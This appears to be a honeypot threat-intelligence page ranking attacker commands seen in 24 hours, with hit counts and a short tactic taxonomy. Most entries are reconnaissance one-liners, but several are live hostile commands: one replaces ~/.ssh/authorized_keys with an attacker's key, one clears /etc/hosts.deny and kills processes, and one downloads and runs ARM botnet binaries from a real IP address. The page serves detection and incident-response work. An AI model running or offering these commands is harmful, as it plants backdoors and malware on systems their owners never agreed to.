Executed Commands

Real-time analysis of the most executed commands by attackers after gaining system access. Data collected from our global honeypot network in the last 24 hours.

7,810 commands in 24h

Top Executed Commands

$cd ~; chattr -ia .ssh; lockr -ia .ssh

139 IPs366x

$lockr -ia .ssh

139 IPs366x

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

138 IPs366x

$cat /proc/cpuinfo | grep name | wc -l

126 IPs321x

$uname -a

132 IPs320x

$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

129 IPs319x

$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

126 IPs318x

$lscpu | grep Model

129 IPs318x

$uname

128 IPs317x

10.

$top

127 IPs316x

11.

$whoami

128 IPs316x

12.

$ls -lh $(which ls)

126 IPs315x

13.

$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

126 IPs315x

14.

$which ls

126 IPs315x

15.

$crontab -l

125 IPs313x

16.

$uname -m

126 IPs312x

17.

$cat /proc/cpuinfo | grep model | grep name | wc -l

126 IPs312x

18.

$w

125 IPs310x

19.

$Enter new UNIX password:

109 IPs210x

20.

$Enter new UNIX password:

109 IPs210x

21.

$cat /proc/uptime 2 > /dev/null | cut -d. -f1

31 IPs142x

22.

rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

78 IPs111x

23.

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version

45 IPs103x

24.

$uname -s -v -n -m 2 > /dev/null

45 IPs103x

25.

$uname -s -v -n -r -m

21 IPs96x

26.

$uname -m 2 > /dev/null

31 IPs71x

27.

$/bin/./uname -s -v -n -r -m

13 IPs55x

28.

$echo SCANNER_TEST

34 IPs40x

29.

cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.uhavenobotsxd; curl http://94.154.35.154/arm.uhavenobotsxd -O; chmod +x arm.uhavenobotsxd; ./arm.uhavenobotsxd android; busybox wget http://94.154.35.154/arm5.uhavenobotsxd; curl http://94.154.35.154/arm5.uhavenobotsxd -O; chmod +x arm5.uhavenobotsxd; ./arm5.uhavenobotsxd android; busybox wget http://94.154.35.154/arm6.uhavenobotsxd; curl http://94.154.35.154/arm6.uhavenobotsxd -O; chmod +x arm6.uhavenobotsxd; ./arm6.uhavenobotsxd

1 IPs31x

30.

$shell

7 IPs14x

Reconnaissance

Commands to gather system information (uname, whoami, cat /etc/passwd)

Download

Commands to download malware (wget, curl, tftp)

Persistence

Commands to maintain access (crontab, chmod, chattr)

Lateral Movement

Commands to spread across the network (ssh, scp, ping)

About this data

These commands are captured in real-time when attackers gain access to our honeypots. They represent actual techniques used in automated and manual attacks. Use this information to improve your threat detection and incident response.